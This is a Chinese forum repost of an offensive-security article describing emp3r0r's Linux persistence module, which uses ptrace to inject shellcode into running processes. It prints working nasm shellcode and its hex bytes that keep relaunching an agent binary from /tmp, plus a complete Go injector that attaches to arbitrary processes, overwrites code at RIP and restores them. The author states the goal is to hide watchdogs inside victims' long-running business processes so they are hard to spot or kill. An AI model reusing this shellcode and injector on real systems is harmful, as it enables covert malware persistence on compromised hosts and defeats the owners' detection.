嵌入式开发交流网论坛

标题: emp3r0r-Linux下的进程注入和持久化 [打印本页]

作者: 你不防 时间: 2021-1-22 07:38
标题: emp3r0r-Linux下的进程注入和持久化
[attach]57256[/attach]

背景

本文所介绍的内容是emp3r0r框架持久化模块的一部分。
Linux有一个独特的东西叫procfs，把“Everything is a file”贯彻到了极致。从/proc/pid/maps我们能查看进程的内存地址分布，然后在/proc/pid/mem我们可以读取或者修改它的内存。
所以理论上我们只需要一个dd和procfs即可将代码注入一个进程，也确实有人写了相关的工具。
但既然Linux提供了一个接口（只有这么一个，不像你们Windows），我们在通常情况下直接调用它就可以了。
ptrace

对，这唯一的接口就是ptrace。
这东西是用来操作进程的，大多用于调试器，它提供的功能足够我们完成本文所需的shellcode注入以及进程恢复了。
我们的思路是：

attach到目标进程，将其接管
把shellcode写到RIP指向的位置，在此之前先备份原有的代码
恢复进程运行
shellcode执行到中断，trap#SIGTRAP)并被我们接管
我们把原先的代码写回去，寄存器也都恢复
继续原进程的执行

进程的恢复

看了上面的思路，这个似乎并不难。但别忘了，你的shellcode搞乱的不只是这段text和寄存器，它至少还搞乱了原进程的的stack，而且shellcode可能会一直堵塞主线程，这样就永远也不会回到原进程的执行流程了。
而且有的shellcode会直接execve从而干脆利落地让原进程成为虚无，你除了再execve回去基本上别无它法了。
所以，我直接从原进程fork出一个子进程，在子进程里执行我的shellcode，顺手恢复原进程，对进程的影响几乎可以忽略不计。
菜鸡的第一份shellcode

本菜鸡从未写过shellcode，是msfvenom的忠实用户。
我寻思着第一份shellcode就不写烂大街的hello world了，直接写个能用的岂不美哉。
于是在duckduckgo和某开源社区大佬们的指导下，我逐渐明白了该怎么写，武器化之后，就有了这篇文章。
怎么写

啥语言
正常情况下都是用汇编来写，不过C也可以。某大佬推荐的是这样：
[attach]57257[/attach]

这样写显而易见的好处是，我们不用费心去操作栈了，数据可以由C来安排好。
本文使用纯汇编来做，这种方法以后有机会再尝试了。
编辑器
我当然直接用vim了，你们随便找个熟悉的文本编辑器都可以。
这里用的是nasm汇编器，使用Intel语法。
nasm
写shellcode的话，不用section .data是最好的，省得多出来一堆\0字节。
大体上一个针对x86_64的nasm汇编代码长这样：
BITS 64 global _start section .text _start: ...your code...
global _start类似于main，是给linker用的。BITS 64代表这是64位汇编。
hex string
上面写的东西要转成raw bytes才能用。首先你需要将它们汇编：
nasm yourshellcode.asm -o shellcode.bin
然后把这个二进制文件转换成hex string：
xxd -i shellcode.bin | grep 0x | tr -d '[:space:]' | tr -d ',' | sed 's/0x/\\x/g' \x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x7f\x5e\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x74\x2c\x48\x31\xff\x48\x89\xc7\x48\x31\xf6\x48\x31\xd2\x4d\x31\xd2\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\xb0\x23\x6a\x0a\x6a\x14\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe2\xc4\x48\x31\xd2\x52\x48\x31\xc0\x48\xbf\x2f\x2f\x74\x6d\x70\x2f\x2f\x65\x57\x54\x5f\x48\x89\xe7\x52\x57\x48\x89\xe6\x6a\x3b\x58\x99\x0f\x05\xcd\x03
如果你不需要这种C style的hex string，也可以这样：
rax2 -S < shellcode.bin 4831c04831ffb0390f054883f8007f5e4831c04831ffb0390f054883f800742c4831ff4889c74831f64831d24d31d24831c0b03d0f054831c0b0236a0a6a144889e74831f64831d20f05e2c44831d2524831c048bf2f2f746d702f2f6557545f4889e752574889e66a3b58990f05cd03
其中rax2是radare2的一部分。
syscall

syscall NR
什么是syscall。
为啥叫NR？我查到的是Numeric Reference，听起来有点道理。
简单来说就是代表某个Linux API的数字了，你调用这个syscall的时候需要告诉Linux对应的编号。
这里有一个全面的Linux syscall列表供查阅。
需要注意的是不同架构下，syscall是不同的。我们这里只关心x86_64下的syscall，毕竟主流Linux主机几乎全都是这个架构（说到这里我要吐槽一下，为什么至今Linux shellcode相关教程还在拿x86汇编教学？）。
调用约定
调用一个syscall的过程跟你调用别的什么函数没区别，你设置好参数，call一下就完事了，它还会把返回值给你。
那么用户怎么知道往哪放参数，从哪取返回值呢？离开了编译器的帮助，你得搞清楚它究竟是怎么工作的。
[attach]57258[/attach]

上图很清楚地展示了你该怎么使用这些syscall。
对于x86_64架构的Linux而言，syscall NR也就是编号，需要放到RAX寄存器，调用完返回值也在这里面，然后参数依次放到RDI，RSI，RDX，R10…
需要留意，有的参数是指针类型的，你传入的必须是一个地址而不是数值本身。
写一个guardian

本示例是emp3r0r的一部分，之后更新的版本可以在这里找到。
看完了上面的介绍，是不是觉得很简单呢？让我们来写个guardian程序试试吧。
这段shellcode就是前面所提到思路的具体实现。
我在写这段东西的时候，遇到了不少小问题，对于初学者来说可能是会头疼好久的问题，简单列一下：

需要指针参数的，先push入栈，再传RSP
push的操作数超过4字节长，需要借助寄存器来push
记得给字符串或者字符串数组加\0终止
label不能用保留字

以上问题均针对nasm汇编器，如果你没遇到，就不要告诉我了。
还有些东西说一下：

为什么还要wait子进程，因为不这样的话子进程退出之后就变成zombie，在进程列表里太显眼了。
为什么fork两次，因为我要execve，在当前进程干的话，当前进程就无了。
为什么sleep，因为太频繁了会把CPU搞飞起。
为什么int 0x3，因为这样是告诉父进程请调试我，是shellcode暂停，从而恢复原进程的关键

BITS 64 section .text global _start _start: ;; fork xor rax, rax xor rdi, rdi mov al, 0x39; syscall fork syscall cmp rax, 0x0; check return value jg pause; int3 if in parent watchdog: ;; fork to exec agent xor rax, rax xor rdi, rdi mov al, 0x39; syscall fork syscall cmp rax, 0x0; check return value je exec; exec if in child wait4zombie: ;; wait to clean up zombies xor rdi, rdi mov rdi, rax xor rsi, rsi xor rdx, rdx xor r10, r10 xor rax, rax mov al, 0x3d syscall sleep: ;; sleep xor rax, rax mov al, 0x23; syscall nanosleep push 10; sleep nano sec push 20; sec mov rdi, rsp xor rsi, rsi xor rdx, rdx syscall loop watchdog exec: ;; char **envp xor rdx, rdx push rdx; '\0' ;; char *filename xor rax, rax mov rdi, 0x652f2f706d742f2f; path to the executable push rdi; save to stack push rsp pop rdi mov rdi, rsp; you can delete this as it does nothing ;; char **argv push rdx; '\0' push rdi mov rsi, rsp; argv[0] push 0x3b; syscall execve pop rax; ready to call cdq syscall pause: ;; trap int 0x3
把shellcode武器化

shellcode注入

就像开头所提到的，本文涉及的技术是emp3r0r后渗透框架的一部分。
emp3r0r会将本文的shellcode自动注入一些常见的进程：
[attach]57259[/attach]

在不影响原进程的情况下，我们同时在目标主机的业务进程里启动了一大堆守护进程，除非受害者拿gdb去看，一般来说是很难察觉异常的。
如果你有兴致，也完全可以写一个别的shellcode，实现更多好玩的功能。
所以我们怎么注入？按照前面ptrace的方法，具体实现如下（之后的更新在这里查看）：
// Injector inject shellcode to arbitrary running process // target process will be restored after shellcode has done its job func Injector(shellcode *string, pid int) error { // format *shellcode = strings.Replace(*shellcode, ",", "", -1) *shellcode = strings.Replace(*shellcode, "0x", "", -1) *shellcode = strings.Replace(*shellcode, "\\x", "", -1) // decode hex shellcode string sc, err := hex.DecodeString(*shellcode) if err != nil { return fmt.Errorf("Decode shellcode: %v", err) } // inject to an existing process or start a new one // check /proc/sys/kernel/yama/ptrace_scope if you cant inject to existing processes if pid == 0 { // start a child process to inject shellcode into sec := strconv.Itoa(RandInt(10, 30)) child := exec.Command("sleep", sec) child.SysProcAttr = &syscall.SysProcAttr{Ptrace: true} err = child.Start if err != nil { return fmt.Errorf("Start `sleep %s`: %v", sec, err) } pid = child.Process.Pid // attach err = child.Wait // TRAP the child if err != nil { log.Printf("child process wait: %v", err) } log.Printf("Injector (%d): attached to child process (%d)", os.Getpid, pid) } else { // attach to an existing process proc, err := os.FindProcess(pid) if err != nil { return fmt.Errorf("%d does not exist: %v", pid, err) } pid = proc.Pid // http://github.com/golang/go/issues/43685 runtime.LockOSThread defer runtime.UnlockOSThread err = syscall.PtraceAttach(pid) if err != nil { return fmt.Errorf("ptrace attach: %v", err) } _, err = proc.Wait if err != nil { return fmt.Errorf("Wait %d: %v", pid, err) } log.Printf("Injector (%d): attached to %d", os.Getpid, pid) } // read RIP origRegs := &syscall.PtraceRegs{} err = syscall.PtraceGetRegs(pid, origRegs) if err != nil { return fmt.Errorf("my pid is %d, reading regs from %d: %v", os.Getpid, pid, err) } origRip := origRegs.Rip log.Printf("Injector: got RIP (0x%x) of %d", origRip, pid) // save current code for restoring later origCode := make(byte, len(sc)) n, err := syscall.PtracePeekText(pid, uintptr(origRip), origCode) if err != nil { return fmt.Errorf("PEEK: 0x%x", origRip) } log.Printf("Peeked %d bytes of original code: %x at RIP (0x%x)", n, origCode, origRip) // write shellcode to .text section, where RIP is pointing at data := sc n, err = syscall.PtracePokeText(pid, uintptr(origRip), data) if err != nil { return fmt.Errorf("POKE_TEXT at 0x%x %d: %v", uintptr(origRip), pid, err) } log.Printf("Injected %d bytes at RIP (0x%x)", n, origRip) // peek: see if shellcode has got injected peekWord := make(byte, len(data)) n, err = syscall.PtracePeekText(pid, uintptr(origRip), peekWord) if err != nil { return fmt.Errorf("PEEK: 0x%x", origRip) } log.Printf("Peeked %d bytes of shellcode: %x at RIP (0x%x)", n, peekWord, origRip) // continue and wait err = syscall.PtraceCont(pid, 0) if err != nil { return fmt.Errorf("Continue: %v", err) } var ws syscall.WaitStatus _, err = syscall.Wait4(pid, &ws, 0, nil) if err != nil { return fmt.Errorf("continue: wait4: %v", err) } // what happened to our child? switch { case ws.Continued: return nil case ws.CoreDump: err = syscall.PtraceGetRegs(pid, origRegs) if err != nil { return fmt.Errorf("read regs from %d: %v", pid, err) } return fmt.Errorf("continue: core dumped: RIP at 0x%x", origRegs.Rip) case ws.Exited: return nil case ws.Signaled: err = syscall.PtraceGetRegs(pid, origRegs) if err != nil { return fmt.Errorf("read regs from %d: %v", pid, err) } return fmt.Errorf("continue: signaled (%s): RIP at 0x%x", ws.Signal, origRegs.Rip) case ws.Stopped: stoppedRegs := &syscall.PtraceRegs{} err = syscall.PtraceGetRegs(pid, stoppedRegs) if err != nil { return fmt.Errorf("read regs from %d: %v", pid, err) } log.Printf("Continue: stopped (%s): RIP at 0x%x", ws.StopSignal.String, stoppedRegs.Rip) // restore registers err = syscall.PtraceSetRegs(pid, origRegs) if err != nil { return fmt.Errorf("Restoring process: set regs: %v", err) } // breakpoint hit, restore the process n, err = syscall.PtracePokeText(pid, uintptr(origRip), origCode) if err != nil { return fmt.Errorf("POKE_TEXT at 0x%x %d: %v", uintptr(origRip), pid, err) } log.Printf("Restored %d bytes at origRip (0x%x)", n, origRip) // let it run err = syscall.PtraceDetach(pid) if err != nil { return fmt.Errorf("Continue detach: %v", err) } log.Printf("%d will continue to run", pid) return nil default: err = syscall.PtraceGetRegs(pid, origRegs) if err != nil { return fmt.Errorf("read regs from %d: %v", pid, err) } log.Printf("continue: RIP at 0x%x", origRegs.Rip) } return nil }
这可能是为数不多的纯go实现的ptrace进程注入工具之一。
主要坑点有：

Go的syscall wrapper基本上是从来没有文档的
ptrace的tracer必须来自同一线程，这是Linux（或者说整个unix）设计的问题
因为Go底层设计的原因，每次调用syscall wrapper，都是一个新线程，所以我研究了半天，靠runtime.LockOSThread解决了这个问题

然后具体原理就很简单了，鉴于Go的syscall wrapper实际上把PTRACE_PEEKTEXT和PTRACE_POKETEXT限制的每次只能操作一个word给包装成可操作任意长度数据，这个实现甚至比C原生实现还要简单。
关键点在于备份和恢复。记得我的shellcode写了int 0x3吧？这里就是wait到int 0x3导致的trap的状态，进行介入，并恢复原进程。
在持久化方面的应用

我目前把这个技术用在持久化方面。虽说不是真正意义上的持久化，但很多机器是万年不重启的，注入到一个几乎不会重启的进程里面，既不会被轻易发现，又很难被干掉。
以下是注入到一个简单demo程序的示例：
/* * This program is used to check shellcode injection * */ #include #include #include int main(int argc, char* argv) { time_t rawtime; struct tm* timeinfo; while (1) { sleep(1); time(&rawtime); timeinfo = localtime(&rawtime); printf("%s: sleeping\n", asctime(timeinfo)); } return 0; }
shellcode成功注入，原进程继续运行，只是多了个守护emp3r0r的任务。
[attach]57260[/attach]

欢迎光临嵌入式开发交流网论坛 (http://www.dianzixuexi.com/bbs/)